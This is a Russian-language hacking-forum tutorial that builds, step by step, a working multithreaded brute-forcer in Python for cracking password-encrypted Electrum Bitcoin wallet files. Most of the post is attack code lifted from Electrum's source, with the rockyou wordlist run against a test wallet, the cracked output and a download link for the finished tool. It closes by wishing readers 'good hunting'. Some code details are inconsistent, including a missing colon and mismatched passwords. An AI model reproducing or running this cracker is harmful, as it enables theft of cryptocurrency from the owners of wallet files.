Вскрываем encrypted Electrum Wallets методом грубой силы

  • Автор темы Admin

Admin

#1
Администратор
Регистрация
31.12.2019
Сообщения
6,486
Реакции
12
BruteForce encrypted Electum Wallets. Python coding. Have Fun!



Доброго времени суток, дорогие форумчане! Я не силен в написании статей и никогда не работал журналистом, поэтому, предположительно, статья не будет произведением литературного искусства, но мне это и не нужно, моя цель - донести до вас техническую часть как можно прозрачнее. Мы проведем небольшое исследование Electrum Bitcoin Wallet (далее EBW), а именно:

Мое любимое: будем кодить, разбирать исходный код EBW;
Сделаем многопоточный брутфорсер для вскрытия кошельков Electrum на Python3;
Ну и, конечно же, протестируем все это дело



Если Вы решили, что данная тема будет интересна для Вас, тогда - приступим. Сварите свой любимый кофе и поехали ...



PS: Я буду использовать OS Ubuntu 18.04, Python 3.6.9, Sublime Text 3 для разработки нашего брутфорсера.



1. Создание проекта



Для начала скачаем Electrum-4.x.x.tar.gz (https://electrum.org/panel-download.html) python source и распакуем (я буду использовать версию 4.1.2):

Код:
cd ~/Downloads && tar -xf Electrum-4.1.2.tar.gz && cd Electrum-4.x.x && ls -w1

И имеем:

Код:
AUTHORS
contrib
electrum
electrum.desktop
Electrum.egg-info
LICENCE
MANIFEST.in
packages
PKG-INFO
README.rst
RELEASE-NOTES
run_electrum
setup.cfg
setup.py

Для проекта нам понадобится только содержимое директории "electrum". В данной директории содержится весь, нужный нам python код который мы будем использовать для построения нашего брутфорсера.

Давайте создадим рабочую директорию:

Код:
mkdir ~/EBW_bf
mkdir ~/EBW_bf/src
cp -r ~/Downloads/Electrum-4.1.2/electrum ~/EBW_bf/
cd ~/EBW_bf

Будем работать в виртуальном python-окруженни, поэтому в директории с поектом сделаем следующее:

Код:
python3 -m venv ./venv && source ./venv/bin/activate

PS: Я обращаюсь python модулям через -m, т.к. для меня интуитивно понятнее к какой версии python я обращаюсь.



Все подготовлено, можно приступать к написанию кода, а вернее к копипасту из исходников Electrum. Для начала ознакомимся с самим процессом расшифровки кошелка, я обозначу ее в виде схемы:

f104626494916077f6907.png


2. Кодинг



Начнем с main.py



Здесь нам понадобится класс WalletStorage, который и будет содержать методы расшифровки нашего кошелька. Я буду игнорировать ненужные нам методы, т.к. мы сосредоточимся только на проверке пароля. Чтобы понять, как организована инициализация кошелька в Electrum обратимся к electrum/storage.py, а конкретно, к классу WalletStorage. При проверке пароля (ключа) Electrum инициализирует класс WalletStorage и вызывает из него метод check_password(), который вызывает метот decrypt(). Так.. не очень понятно, как мне кажется. Давайте запишем эту конструкцию псевдокодом для большей ясности:

Код:
init class WalletStorage('path_to_walet') --> check_password(password) --> decrypt(password)

Более-менее...

В итоге я пришел к такому началу:

Код:
import hashlib
import sys
import os

from src import ecc

class WalletStorage(object):
	def __init__(self, path):
		
		self.path = os.path.join( os.path.dirname(os.path.realpath(__file__)), path)
		self._file_exists = bool(self.path and os.path.exists(self.path))
		self.pubkey = None
		self.decrypted = ''

		with open(self.path, "r", encoding='utf-8') as f:
			self.raw = f.read()

	def _get_encryption_magic(self):
		return b'BIE1'

	def decrypt(self, password) -> None:
		ec_key = self.get_eckey_from_password(password)
		
		s = False
		if self.raw:
			enc_magic = self._get_encryption_magic()
			s = ec_key.decrypt_message(self.raw, enc_magic)
		if s:
			print('[+] %s' % password)

	def check_password(self, password) -> None:
		self.decrypt(password)

	@staticmethod
	def get_eckey_from_password(password):
		secret = hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'), b'', iterations=1024)
		ec_key = ecc.ECPrivkey.from_arbitrary_size_secret(secret)

		return ec_key

def main():

	# get wallet name for args
	wallet_name = None
	if len(sys.argv) != 2:
		print('Usage: %s <wallet_name>' % sys.argv[0])
		exit()
	else:
		wallet_name = sys.argv[1]
		if not os.path.exists(wallet_name):
			print('Wallet not found in current directory.')
			exit()

	# init wallet
	wallet = WalletStorage(wallet_name)

	for password in ['test1', 'passwordTest2']:
		wallet.check_password(password)

if __name__ == "__main__":
	main = main()

Метод decrypt использует следующие методы:

get_eckey_from_password - получение EC_KEY из секрета. Метод возвращает объект класса ECPrivkey к которому мы обратимся позже.
_get_encryption_magic - получение способа шифрования (пароль, ключ и пр). Можете заметить, что я сократил этот метод до return b'BIE1', т.к буду рассматривать только способ шифрования по паролю. BIE1 - первые 4 символа кошелька, отвечающие за способ шифрования (сделайте base64 decode если не доверяете)



Следующим шагом рассмотрим методы класса ECPrivkey, а конкретно, метода decrypt_message, который и даст нам желаемое ДА или НЕТ при проверке пароля. Начнем по-порядку: первым у нас вызывается метод decrypt(password)--> get_eckey_from_password(password) который обращается к методу ecc.ECPrivkey.from_arbitrary_size_secret(secret)


Давайте создадим файл ecc.py в рабочей директории src, который и будет содержать класс ECPrivkey:


PS: я соблюдаю аналогичные обазначения имен файлов с проектом electrum, что бы не возникло путаницы.

должно получится так:

Код:
electrum
venv
main.py
src
├── ecc.py
└── __init__.py

В __init__.py обозначим наш ecc.py

__init__.py

Код:
from . import ecc

Приступим к формированию ecc.py: на этом этапе нам понадобятся классы ECPubkey и ECPrivkey с необходимым для наших целей набором методов.



Первым делом, у нас вызвается статичный метод класса: ECPrivkey.from_arbitrary_size_secret(secret), давайте посмотрим что там происходит: обратимся к electrum/ecc.py

Опять все запутанно... давайте запишем в читабельном виде:

Код:
from_arbitrary_size_secret() --> init class ECPrivkey(какой-то скаляр) --> init class ECPubkey(что-то нечеловеческое).

Т.е. статичный метод from_arbitrary_size_secret инициализирует класс ECPrivkey, кторый в свою очередь при инициализации инициализирует класс ECPubkey (GENERATOR).

Давайте все оформим:

ecc.py

Код:
from typing import Union, Tuple, Optional
from ctypes import (
	byref, c_byte, c_int, c_uint, c_char_p, c_size_t, c_void_p, create_string_buffer,
	CFUNCTYPE, POINTER, cast
)
import base64
import hashlib

from src.util import assert_bytes
from src.ecc_fast import _libsecp256k1, SECP256K1_EC_UNCOMPRESSED
from src.crypto import hmac_oneshot

def string_to_number(b: bytes) -> int:
	return int.from_bytes(b, byteorder='big', signed=False)

def is_secret_within_curve_range(secret: Union[int, bytes]) -> bool:
	if isinstance(secret, bytes):
		secret = string_to_number(secret)
	return 0 < secret < CURVE_ORDER

def _x_and_y_from_pubkey_bytes(pubkey: bytes) -> Tuple[int, int]:
	assert isinstance(pubkey, bytes), f'pubkey must be bytes, not {type(pubkey)}'
	
	pubkey_ptr = create_string_buffer(64)
	ret = _libsecp256k1.secp256k1_ec_pubkey_parse(
		_libsecp256k1.ctx, pubkey_ptr, pubkey, len(pubkey))
	if not ret:
		raise InvalidECPointException('public key could not be parsed or is invalid')

	pubkey_serialized = create_string_buffer(65)
	pubkey_size = c_size_t(65)
	_libsecp256k1.secp256k1_ec_pubkey_serialize(
		_libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey_ptr, SECP256K1_EC_UNCOMPRESSED)
	pubkey_serialized = bytes(pubkey_serialized)
	assert pubkey_serialized[0] == 0x04, pubkey_serialized
	x = int.from_bytes(pubkey_serialized[1:33], byteorder='big', signed=False)
	y = int.from_bytes(pubkey_serialized[33:65], byteorder='big', signed=False)
	return x, y

class ECPubkey(object):
	
	def __init__(self, b: Optional[bytes]):
		if b is not None:
			assert isinstance(b, (bytes, bytearray)), f'pubkey must be bytes-like, not {type(b)}'
			if isinstance(b, bytearray):
				b = bytes(b)
			self._x, self._y = _x_and_y_from_pubkey_bytes(b)
		else:
			self._x, self._y = None, None

	def is_at_infinity(self):
		return self == POINT_AT_INFINITY

	def x(self) -> int:
		return self._x

	def y(self) -> int:
		return self._y

	def get_public_key_bytes(self, compressed=True):
		if self.is_at_infinity(): raise Exception('point is at infinity')
		x = int.to_bytes(self.x(), length=32, byteorder='big', signed=False)
		y = int.to_bytes(self.y(), length=32, byteorder='big', signed=False)
		if compressed:
			header = b'\x03' if self.y() & 1 else b'\x02'
			return header + x
		else:
			header = b'\x04'
			return header + x + y

	def _to_libsecp256k1_pubkey_ptr(self):
		pubkey = create_string_buffer(64)
		public_pair_bytes = self.get_public_key_bytes(compressed=False)
		ret = _libsecp256k1.secp256k1_ec_pubkey_parse(
			_libsecp256k1.ctx, pubkey, public_pair_bytes, len(public_pair_bytes))
		if not ret:
			raise Exception('public key could not be parsed or is invalid')
		return pubkey

	@classmethod
	def _from_libsecp256k1_pubkey_ptr(cls, pubkey) -> 'ECPubkey':
		pubkey_serialized = create_string_buffer(65)
		pubkey_size = c_size_t(65)
		_libsecp256k1.secp256k1_ec_pubkey_serialize(
			_libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey, SECP256K1_EC_UNCOMPRESSED)
		return ECPubkey(bytes(pubkey_serialized))

	def __mul__(self, other: int):
		
		if not isinstance(other, int):
			raise TypeError('multiplication not defined for ECPubkey and {}'.format(type(other)))

		other %= CURVE_ORDER
		
		if self.is_at_infinity() or other == 0:
			return POINT_AT_INFINITY

		pubkey = self._to_libsecp256k1_pubkey_ptr()

		ret = _libsecp256k1.secp256k1_ec_pubkey_tweak_mul(_libsecp256k1.ctx, pubkey, other.to_bytes(32, byteorder="big"))
		
		if not ret:
			return POINT_AT_INFINITY

		return ECPubkey._from_libsecp256k1_pubkey_ptr(pubkey)

CURVE_ORDER = 0xFFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFE_BAAEDCE6_AF48A03B_BFD25E8C_D0364141
GENERATOR = ECPubkey(bytes.fromhex('0479be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798'
								   '483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8'))
POINT_AT_INFINITY = ECPubkey(None)

class ECPrivkey(ECPubkey):
	def __init__(self, privkey_bytes: bytes):
		
		assert_bytes(privkey_bytes)
		if len(privkey_bytes) != 32:
			raise Exception('unexpected size for secret. should be 32 bytes, not {}'.format(len(privkey_bytes)))
	
		secret = string_to_number(privkey_bytes)

		if not is_secret_within_curve_range(secret):
			raise InvalidECPointException('Invalid secret scalar (not within curve order)')
		self.secret_scalar = secret

		pubkey = GENERATOR * secret

		super().__init__(pubkey.get_public_key_bytes(compressed=False))

	@classmethod
	def from_arbitrary_size_secret(cls, privkey_bytes: bytes):
		return ECPrivkey(cls.normalize_secret_bytes(privkey_bytes))

	@classmethod
	def normalize_secret_bytes(cls, privkey_bytes: bytes) -> bytes:
		scalar = string_to_number(privkey_bytes) % CURVE_ORDER
		if scalar == 0:
			raise Exception('invalid EC private key scalar: zero')
		privkey_32bytes = int.to_bytes(scalar, length=32, byteorder='big', signed=False)
		return privkey_32bytes

	def decrypt_message(self, encrypted: Union[str, bytes], magic: bytes=b'BIE1') -> bytes:
		
		encrypted = base64.b64decode(encrypted)
		if len(encrypted) < 85:
			return False
		
		magic_found = encrypted[:4]
		ephemeral_pubkey_bytes = encrypted[4:37]
		ciphertext = encrypted[37:-32]
		mac = encrypted[-32:]
		if magic_found != magic:
			return False
		try:
			ephemeral_pubkey = ECPubkey(ephemeral_pubkey_bytes)
		
		except InvalidECPointException as e:
			return False
		
		ecdh_key = (ephemeral_pubkey * self.secret_scalar).get_public_key_bytes(compressed=True)
		key = hashlib.sha512(ecdh_key).digest()
		iv, key_e, key_m = key[0:16], key[16:32], key[32:]

		if mac != hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256):
			return False
		else:
			return True

Здесь мы обращаемся к:

assert_bytes() из electrum/util.py
_libsecp256k1, SECP256K1_EC_UNCOMPRESSED из electrum/ecc_fast.py (Библиотека C для сигнатур ECDSA и операций с секретным/открытым ключом на кривой secp256k1)
hmac_oneshot() из electrum/crypto.py



Давайте их позаимствуем из соответствующих electrum/* py-файлов:
создаем в директории src: util.py, ecc_fast.py, crypto.py соответственно.



И теперь наш __init__.py примет следующий вид:



__init__.py

Код:
from . import ecc
from . import util
from . import ecc_fast
from . import crypto

Дальше я подумал за Вас и оставил все самое необходимое из кучи ненужного кода:

ecc_fast.py

Код:
import os
import sys
import ctypes
from ctypes import (
    byref, c_byte, c_int, c_uint, c_char_p, c_size_t, c_void_p, create_string_buffer,
    CFUNCTYPE, POINTER, cast
)

SECP256K1_FLAGS_TYPE_MASK = ((1 << 8) - 1)
SECP256K1_FLAGS_TYPE_CONTEXT = (1 << 0)
SECP256K1_FLAGS_TYPE_COMPRESSION = (1 << 1)
# /** The higher bits contain the actual data. Do not use directly. */
SECP256K1_FLAGS_BIT_CONTEXT_VERIFY = (1 << 8)
SECP256K1_FLAGS_BIT_CONTEXT_SIGN = (1 << 9)
SECP256K1_FLAGS_BIT_COMPRESSION = (1 << 8)

# /** Flags to pass to secp256k1_context_create. */
SECP256K1_CONTEXT_VERIFY = (SECP256K1_FLAGS_TYPE_CONTEXT | SECP256K1_FLAGS_BIT_CONTEXT_VERIFY)
SECP256K1_CONTEXT_SIGN = (SECP256K1_FLAGS_TYPE_CONTEXT | SECP256K1_FLAGS_BIT_CONTEXT_SIGN)
SECP256K1_CONTEXT_NONE = (SECP256K1_FLAGS_TYPE_CONTEXT)

SECP256K1_EC_COMPRESSED = (SECP256K1_FLAGS_TYPE_COMPRESSION | SECP256K1_FLAGS_BIT_COMPRESSION)
SECP256K1_EC_UNCOMPRESSED = (SECP256K1_FLAGS_TYPE_COMPRESSION)


class LibModuleMissing(Exception): pass


def load_library()

    library_paths = ['/usr/lib/libsecp256k1.so.0']

    exceptions = []
    secp256k1 = None
    for libpath in library_paths:
        try:
            secp256k1 = ctypes.cdll.LoadLibrary(libpath)
        except BaseException as e:
            exceptions.append(e)
        else:
            break
    if not secp256k1:
        print(f'libsecp256k1 library failed to load. exceptions: {repr(exceptions)}')
        return None

    try:
        secp256k1.secp256k1_context_create.argtypes = [c_uint]
        secp256k1.secp256k1_context_create.restype = c_void_p

        secp256k1.secp256k1_context_randomize.argtypes = [c_void_p, c_char_p]
        secp256k1.secp256k1_context_randomize.restype = c_int

        secp256k1.secp256k1_ec_pubkey_create.argtypes = [c_void_p, c_void_p, c_char_p]
        secp256k1.secp256k1_ec_pubkey_create.restype = c_int

        secp256k1.secp256k1_ecdsa_sign.argtypes = [c_void_p, c_char_p, c_char_p, c_char_p, c_void_p, c_void_p]
        secp256k1.secp256k1_ecdsa_sign.restype = c_int

        secp256k1.secp256k1_ecdsa_verify.argtypes = [c_void_p, c_char_p, c_char_p, c_char_p]
        secp256k1.secp256k1_ecdsa_verify.restype = c_int

        secp256k1.secp256k1_ec_pubkey_parse.argtypes = [c_void_p, c_char_p, c_char_p, c_size_t]
        secp256k1.secp256k1_ec_pubkey_parse.restype = c_int

        secp256k1.secp256k1_ec_pubkey_serialize.argtypes = [c_void_p, c_char_p, c_void_p, c_char_p, c_uint]
        secp256k1.secp256k1_ec_pubkey_serialize.restype = c_int

        secp256k1.secp256k1_ecdsa_signature_parse_compact.argtypes = [c_void_p, c_char_p, c_char_p]
        secp256k1.secp256k1_ecdsa_signature_parse_compact.restype = c_int

        secp256k1.secp256k1_ecdsa_signature_normalize.argtypes = [c_void_p, c_char_p, c_char_p]
        secp256k1.secp256k1_ecdsa_signature_normalize.restype = c_int

        secp256k1.secp256k1_ecdsa_signature_serialize_compact.argtypes = [c_void_p, c_char_p, c_char_p]
        secp256k1.secp256k1_ecdsa_signature_serialize_compact.restype = c_int

        secp256k1.secp256k1_ecdsa_signature_parse_der.argtypes = [c_void_p, c_char_p, c_char_p, c_size_t]
        secp256k1.secp256k1_ecdsa_signature_parse_der.restype = c_int

        secp256k1.secp256k1_ecdsa_signature_serialize_der.argtypes = [c_void_p, c_char_p, c_void_p, c_char_p]
        secp256k1.secp256k1_ecdsa_signature_serialize_der.restype = c_int

        secp256k1.secp256k1_ec_pubkey_tweak_mul.argtypes = [c_void_p, c_char_p, c_char_p]
        secp256k1.secp256k1_ec_pubkey_tweak_mul.restype = c_int

        secp256k1.secp256k1_ec_pubkey_combine.argtypes = [c_void_p, c_char_p, c_void_p, c_size_t]
        secp256k1.secp256k1_ec_pubkey_combine.restype = c_int

        # --enable-module-recovery
        try:
            secp256k1.secp256k1_ecdsa_recover.argtypes = [c_void_p, c_char_p, c_char_p, c_char_p]
            secp256k1.secp256k1_ecdsa_recover.restype = c_int

            secp256k1.secp256k1_ecdsa_recoverable_signature_parse_compact.argtypes = [c_void_p, c_char_p, c_char_p, c_int]
            secp256k1.secp256k1_ecdsa_recoverable_signature_parse_compact.restype = c_int
        except (OSError, AttributeError):
            raise LibModuleMissing('libsecp256k1 library found but it was built '
                                   'without required module (--enable-module-recovery)')

        secp256k1.ctx = secp256k1.secp256k1_context_create(SECP256K1_CONTEXT_SIGN | SECP256K1_CONTEXT_VERIFY)
        ret = secp256k1.secp256k1_context_randomize(secp256k1.ctx, os.urandom(32))
        if not ret:
            print('secp256k1_context_randomize failed')
            return None

        return secp256k1
    except (OSError, AttributeError) as e:
        print(f'libsecp256k1 library was found and loaded but there was an error when using it: {repr(e)}')
        return None


_libsecp256k1 = None
try:
    _libsecp256k1 = load_library()
except BaseException as e:
    print(f'failed to load libsecp256k1: {repr(e)}')


if _libsecp256k1 is None:
    # hard fail:
    sys.exit(f"Error: Failed to load libsecp256k1.")

Обязательно измените путь к libsecp256k1! Он представлен в виде списка в методе load_library()
Стоит отметить, т.к. я пишу брут под Ubuntu то для обнаружения libsecp256k1 я оставил единственный путь:

Код:
library_paths = ['/usr/lib/x86_64-linux-gnu/libsecp256k1.so.0']

PS: Чтобы найти libsecp256k1.so.0 на вашей системе воспользуйтесь утилитой find:

Код:
find /usr/ -iname "libsecp256k1.so.0"

util.py

Код:
def assert_bytes(*args):
    """
    porting helper, assert args type
    """
    try:
        for x in args:
            assert isinstance(x, (bytes, bytearray))
    except:
        print('assert bytes failed', list(map(type, args)))
        raise

crypto.py

Код:
import hmac

from src.util import assert_bytes

def hmac_oneshot(key: bytes, msg: bytes, digest) -> bytes:
    if hasattr(hmac, 'digest'):
        # requires python 3.7+; faster
        return hmac.digest(key, msg, digest)
    else:
        return hmac.new(key, msg, digest).digest()

Готово! Осталось разобраться с пока что не очень понятным ecc.py

Продублирую дабы Вам не скролить:

ecc.py

Код:
from typing import Union, Tuple, Optional
from ctypes import (
	byref, c_byte, c_int, c_uint, c_char_p, c_size_t, c_void_p, create_string_buffer,
	CFUNCTYPE, POINTER, cast
)
import base64
import hashlib

from src.util import assert_bytes
from src.ecc_fast import _libsecp256k1, SECP256K1_EC_UNCOMPRESSED
from src.crypto import hmac_oneshot

def string_to_number(b: bytes) -> int:
	return int.from_bytes(b, byteorder='big', signed=False)

def is_secret_within_curve_range(secret: Union[int, bytes]) -> bool:
	if isinstance(secret, bytes):
		secret = string_to_number(secret)
	return 0 < secret < CURVE_ORDER

def _x_and_y_from_pubkey_bytes(pubkey: bytes) -> Tuple[int, int]:
	assert isinstance(pubkey, bytes), f'pubkey must be bytes, not {type(pubkey)}'
	
	pubkey_ptr = create_string_buffer(64)
	ret = _libsecp256k1.secp256k1_ec_pubkey_parse(
		_libsecp256k1.ctx, pubkey_ptr, pubkey, len(pubkey))
	if not ret:
		raise InvalidECPointException('public key could not be parsed or is invalid')

	pubkey_serialized = create_string_buffer(65)
	pubkey_size = c_size_t(65)
	_libsecp256k1.secp256k1_ec_pubkey_serialize(
		_libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey_ptr, SECP256K1_EC_UNCOMPRESSED)
	pubkey_serialized = bytes(pubkey_serialized)
	assert pubkey_serialized[0] == 0x04, pubkey_serialized
	x = int.from_bytes(pubkey_serialized[1:33], byteorder='big', signed=False)
	y = int.from_bytes(pubkey_serialized[33:65], byteorder='big', signed=False)
	return x, y

class ECPubkey(object):
	
	def __init__(self, b: Optional[bytes]):
		if b is not None:
			assert isinstance(b, (bytes, bytearray)), f'pubkey must be bytes-like, not {type(b)}'
			if isinstance(b, bytearray):
				b = bytes(b)
			self._x, self._y = _x_and_y_from_pubkey_bytes(b)
		else:
			self._x, self._y = None, None

	def is_at_infinity(self):
		return self == POINT_AT_INFINITY

	def x(self) -> int:
		return self._x

	def y(self) -> int:
		return self._y

	def get_public_key_bytes(self, compressed=True):
		if self.is_at_infinity(): raise Exception('point is at infinity')
		x = int.to_bytes(self.x(), length=32, byteorder='big', signed=False)
		y = int.to_bytes(self.y(), length=32, byteorder='big', signed=False)
		if compressed:
			header = b'\x03' if self.y() & 1 else b'\x02'
			return header + x
		else:
			header = b'\x04'
			return header + x + y

	def _to_libsecp256k1_pubkey_ptr(self):
		pubkey = create_string_buffer(64)
		public_pair_bytes = self.get_public_key_bytes(compressed=False)
		ret = _libsecp256k1.secp256k1_ec_pubkey_parse(
			_libsecp256k1.ctx, pubkey, public_pair_bytes, len(public_pair_bytes))
		if not ret:
			raise Exception('public key could not be parsed or is invalid')
		return pubkey

	@classmethod
	def _from_libsecp256k1_pubkey_ptr(cls, pubkey) -> 'ECPubkey':
		pubkey_serialized = create_string_buffer(65)
		pubkey_size = c_size_t(65)
		_libsecp256k1.secp256k1_ec_pubkey_serialize(
			_libsecp256k1.ctx, pubkey_serialized, byref(pubkey_size), pubkey, SECP256K1_EC_UNCOMPRESSED)
		return ECPubkey(bytes(pubkey_serialized))

	def __mul__(self, other: int):
		
		if not isinstance(other, int):
			raise TypeError('multiplication not defined for ECPubkey and {}'.format(type(other)))

		other %= CURVE_ORDER
		
		if self.is_at_infinity() or other == 0:
			return POINT_AT_INFINITY

		pubkey = self._to_libsecp256k1_pubkey_ptr()

		ret = _libsecp256k1.secp256k1_ec_pubkey_tweak_mul(_libsecp256k1.ctx, pubkey, other.to_bytes(32, byteorder="big"))
		
		if not ret:
			return POINT_AT_INFINITY

		return ECPubkey._from_libsecp256k1_pubkey_ptr(pubkey)

CURVE_ORDER = 0xFFFFFFFF_FFFFFFFF_FFFFFFFF_FFFFFFFE_BAAEDCE6_AF48A03B_BFD25E8C_D0364141
GENERATOR = ECPubkey(bytes.fromhex('0479be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798'
								   '483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8'))
POINT_AT_INFINITY = ECPubkey(None)

class ECPrivkey(ECPubkey):
	def __init__(self, privkey_bytes: bytes):
		
		assert_bytes(privkey_bytes)
		if len(privkey_bytes) != 32:
			raise Exception('unexpected size for secret. should be 32 bytes, not {}'.format(len(privkey_bytes)))
	
		secret = string_to_number(privkey_bytes)

		if not is_secret_within_curve_range(secret):
			raise InvalidECPointException('Invalid secret scalar (not within curve order)')
		self.secret_scalar = secret

		pubkey = GENERATOR * secret

		super().__init__(pubkey.get_public_key_bytes(compressed=False))

	@classmethod
	def from_arbitrary_size_secret(cls, privkey_bytes: bytes):
		return ECPrivkey(cls.normalize_secret_bytes(privkey_bytes))

	@classmethod
	def normalize_secret_bytes(cls, privkey_bytes: bytes) -> bytes:
		scalar = string_to_number(privkey_bytes) % CURVE_ORDER
		if scalar == 0:
			raise Exception('invalid EC private key scalar: zero')
		privkey_32bytes = int.to_bytes(scalar, length=32, byteorder='big', signed=False)
		return privkey_32bytes

	def decrypt_message(self, encrypted: Union[str, bytes], magic: bytes=b'BIE1') -> bytes:

		encrypted = base64.b64decode(encrypted)
		if len(encrypted) < 85:
			return False
		
		magic_found = encrypted[:4]
		ephemeral_pubkey_bytes = encrypted[4:37]
		ciphertext = encrypted[37:-32]
		mac = encrypted[-32:]
		if magic_found != magic:
			return False
		try:
			ephemeral_pubkey = ECPubkey(ephemeral_pubkey_bytes)
		except:
			return False
		
		ecdh_key = (ephemeral_pubkey * self.secret_scalar).get_public_key_bytes(compressed=True)
		key = hashlib.sha512(ecdh_key).digest()
		iv, key_e, key_m = key[0:16], key[16:32], key[32:]

		if mac != hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256):
			return False
		else:
			return True

Создание публичного ключа берет свое начало с
pubkey = GENERATOR * secret

Переменная GENERATOR есть ECPubkey(bytes.fromhex('...')). т.е. прототип класса ECPubkey. Чтобы выполнить умножение ECPubkey на int, нужно учесть наличие метода __mul__ (multiplication) в классе ECPubkey.

Теперь разберем долгожданнй метод decrypt_message(), который вызывается в main.py и должен вернуть нам результат. На этом этапе стоит отметить, что у нас уже инициализованы классы ECPubkey и ECPrivkey ранее (держите это в голове)

Код:
def decrypt_message(self, encrypted: Union[str, bytes], magic: bytes=b'BIE1') -> bytes:
		
		encrypted = base64.b64decode(encrypted)
		if len(encrypted) < 85:
			return False
		
		magic_found = encrypted[:4]
		ephemeral_pubkey_bytes = encrypted[4:37]
		ciphertext = encrypted[37:-32]
		mac = encrypted[-32:]
		if magic_found != magic:
			return False
		
		try:
			ephemeral_pubkey = ECPubkey(ephemeral_pubkey_bytes)
		except:
			return False
		
		ecdh_key = (ephemeral_pubkey * self.secret_scalar).get_public_key_bytes(compressed=True)
		key = hashlib.sha512(ecdh_key).digest()
		iv, key_e, key_m = key[0:16], key[16:32], key[32:]

		# здесь мы оставим только return False если пароль не соответствует искомому и return False в противном случае.
		if mac != hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256):
			return False
		else:
			return True

Здесь мы видим, как наш кошелек рвется на куски, далее следуют магические вычесления на основании ephemeral_pubkey (временный публичный ключ) и в завершении если mac не равна hmac_oneshot(key_m, encrypted[:-32], hashlib.sha256) то "следующий пароль пжалста". Ну вот мы и почти у финиша, остается все это дело завернуть в многопоточность и потестировать.

Для достижения многопоточности будем использовать ThreadExecutorPool (кому как, а я просто привык с ней работать). Чтобы не перегружать и без того занятую память, будем читать файл с паролями построчно, а не грузить все их в память.

Вот что я предлагаю:

Код:
que = []
with open(file_with_password, 'r', errors='replace') as fd:
	for password in fd:
		password = password.rstrip()
		que.append(password)

		if len(que) == 1000:
			with ThreadPoolExecutor(max_workers=4) as pool:
						pool.map(worker, que)
		que = []

if len(que) > 0:
	with ThreadPoolExecutor(max_workers=4) as pool:
		pool.map(worker, que)

Добавим прогресс бар: для этого установим удобный пакет tqdm:

Код:
python3 -m pip install tqdm

Здесь стоит отметить, что нам придется перед началом перебора паролей узнать общее кол-во паролей в словаре, для отображения прогресса.

В итоге у нас получится что-то то такое:

main.py

Код:
from concurrent.futures import ThreadPoolExecutor
from tqdm import tqdm
import hashlib
import sys
import os

from src import ecc

class WalletStorage(object):
	def __init__(self, path):
		
		self.path = os.path.join( os.path.dirname(os.path.realpath(__file__)), path)
		self._file_exists = bool(self.path and os.path.exists(self.path))
		self.pubkey = None
		self.decrypted = ''

		with open(self.path, "r", encoding='utf-8') as f:
			self.raw = f.read()

	def _get_encryption_magic(self):
		return b'BIE1'

	def decrypt(self, password) -> None:
		ec_key = self.get_eckey_from_password(password)
		
		s = False
		if self.raw:
			enc_magic = self._get_encryption_magic()
			s = ec_key.decrypt_message(self.raw, enc_magic)
		if s:
			print()
			print('[+] %s' % password)
			exit()

	def check_password(self, password) -> None:
		global PBAR
		
		self.decrypt(password)
		PBAR.update(1)

	@staticmethod
	def get_eckey_from_password(password):
		secret = hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'), b'', iterations=1024)
		ec_key = ecc.ECPrivkey.from_arbitrary_size_secret(secret)

		return ec_key

def main():

	global PBAR 

	# get wallet name for args
	wallet_name = None
	if len(sys.argv) != 2:
		print('Usage: %s <wallet_name>' % sys.argv[0])
		exit()
	else:
		wallet_name = sys.argv[1]
		if not os.path.exists(wallet_name):
			print('Wallet not found in current directory.')
			exit()

	# init wallet
	wallet = WalletStorage(wallet_name)

	print('loading dict ...')
	dict_len = 0
	with open('rockyou.txt', 'r', errors='replace') as fd:
		for line in fd:
			dict_len += 1

	print('starting...')
	print()
	
	PBAR = tqdm(total=dict_len)

	que = []
	with open('rockyou.txt', 'r', errors='replace') as fd:
		for password in fd:
			password = password.rstrip()
			que.append(password)

			if len(que) == 1000:
				with ThreadPoolExecutor(max_workers=4) as pool:
						pool.map(wallet.check_password, que)
				que = []

	if len(que) > 0:
		with ThreadPoolExecutor(max_workers=4) as pool:
			pool.map(wallet.check_password, que)

if __name__ == "__main__":
	main = main()

И такое:

Код:
venv
electrum
rockyou.txt
main.py
src
├── crypto.py
├── ecc_fast.py
├── ecc.py
├── __init__.py
└── util.py

3. Тестируем!

В качестве словаря будем использовать всем известный rockyou.

Создадим кошелек с простеньким паролем (у меня это password123), скопируем его в рабочую директорию и начнем тестировать.

PS: поставьте для тестирования пароль который есть в словаре. Наша задача убедится в корректности работы скрипта, а потом уже делайте все что душе угодно.

Код:
cp ~/.electrum/wallets/test_wallet ~/EBW_bf
python3 main.py test_wallet

ПК шумит, а мы просто ждем :]

Код:
loading dict ...
starting...

 38%|█████████▉                | 5491654/14344324 [6489.81it/s]
[+] testpassword123

PwN! Результат не заставил себя долго ждать. Надеюсь в этой статье Вы что-то подчеркнули для себя и будете использовать полученные знания в дальнейшем (естественно в благих целях). Всем успешной охоты!

Ссылка на реализацию: https://anonfiles.com/33L2W4s3ua/EBW_bf.tar_rar

Автор: alex_X40s